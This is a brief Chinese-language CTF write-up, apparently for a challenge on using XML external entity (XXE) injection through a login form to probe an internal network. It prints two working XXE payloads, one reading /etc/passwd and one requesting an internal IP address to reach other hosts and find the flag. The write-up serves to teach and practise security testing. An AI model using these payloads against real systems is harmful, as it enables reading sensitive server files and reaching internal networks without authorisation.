知識點
- XXE探測內網
一如既往的登錄框
抓包,添加外部注入實體,讀取/etc/passwd
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///etc/passwd"> ]> <user><username>&admin;</username><password>123546</password></user>
讀取歷史操作命令.bash_history失敗
讀取/etc/hosts文件
看到內網有存活的主機,嘗試訪問
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [ <!ENTITY admin SYSTEM "http://173.241.204.10"> ]> <user><username>&admin;</username><password>123546</password></user>
在173.241.204.11主機處發現flag